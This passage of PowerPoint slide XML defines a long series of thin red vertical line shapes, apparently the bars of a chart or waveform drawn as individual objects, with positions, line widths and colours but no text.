          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="261" name="object 261"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4621498" y="5544465"/>
            <a:ext cx="0" cy="445455"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="224789">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="224789"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="8606">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="262" name="object 262"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4641332" y="5614077"/>
            <a:ext cx="0" cy="373730"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="188594">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="188159"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5603">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="263" name="object 263"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4641332" y="5611102"/>
            <a:ext cx="0" cy="380021"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="191769">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="191162"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="8606">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="264" name="object 264"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4661164" y="5364176"/>
            <a:ext cx="0" cy="622883"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="314325">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="314266"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5603">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="265" name="object 265"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4661164" y="5361201"/>
            <a:ext cx="0" cy="629174"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="317500">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="317269"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="8606">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="266" name="object 266"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4681395" y="5597412"/>
            <a:ext cx="0" cy="390088"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="196850">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="196568"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="267" name="object 267"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4681395" y="5594439"/>
            <a:ext cx="0" cy="396380"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="200025">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="199570"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="268" name="object 268"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4701229" y="5503011"/>
            <a:ext cx="0" cy="484464"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="244475">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="244207"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="269" name="object 269"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4701229" y="5500034"/>
            <a:ext cx="0" cy="490756"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="247650">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="247209"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="270" name="object 270"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4721062" y="5658505"/>
            <a:ext cx="0" cy="328429"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="165735">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="165739"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="271" name="object 271"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4721062" y="5655530"/>
            <a:ext cx="0" cy="334721"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="168910">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="168741"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="272" name="object 272"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4740896" y="5497458"/>
            <a:ext cx="0" cy="489498"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="247014">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="247008"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="273" name="object 273"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4740896" y="5494483"/>
            <a:ext cx="0" cy="495789"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="250189">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="250011"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="274" name="object 274"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4760729" y="5714039"/>
            <a:ext cx="0" cy="273062"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="137794">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="137715"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="275" name="object 275"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4760729" y="5711064"/>
            <a:ext cx="0" cy="279353"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="140969">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="140718"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="276" name="object 276"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4780563" y="5586310"/>
            <a:ext cx="0" cy="401413"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="202564">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="202171"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="277" name="object 277"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4780563" y="5583334"/>
            <a:ext cx="0" cy="407705"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="205739">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="205174"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="278" name="object 278"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4800395" y="5702927"/>
            <a:ext cx="0" cy="284387"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="143510">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="143322"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="279" name="object 279"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4800395" y="5699953"/>
            <a:ext cx="0" cy="290679"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="146685">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="146324"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="280" name="object 280"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4820230" y="5525225"/>
            <a:ext cx="0" cy="461814"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="233044">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="232996"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="281" name="object 281"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4820230" y="5522248"/>
            <a:ext cx="0" cy="468106"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="236219">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="235999"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="282" name="object 282"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4840062" y="5686272"/>
            <a:ext cx="0" cy="300745"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="151764">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="151727"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="283" name="object 283"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4840062" y="5683297"/>
            <a:ext cx="0" cy="307037"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="154939">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="154729"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="284" name="object 284"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4859896" y="5602972"/>
            <a:ext cx="0" cy="385055"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="194310">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="193763"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="285" name="object 285"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4859896" y="5599996"/>
            <a:ext cx="0" cy="390088"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="196850">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="196765"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="286" name="object 286"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4879729" y="5658505"/>
            <a:ext cx="0" cy="328429"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="165735">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="165739"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="287" name="object 287"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4879729" y="5655530"/>
            <a:ext cx="0" cy="334721"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="168910">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="168741"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="288" name="object 288"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4899961" y="5608524"/>
            <a:ext cx="0" cy="378763"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="191135">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
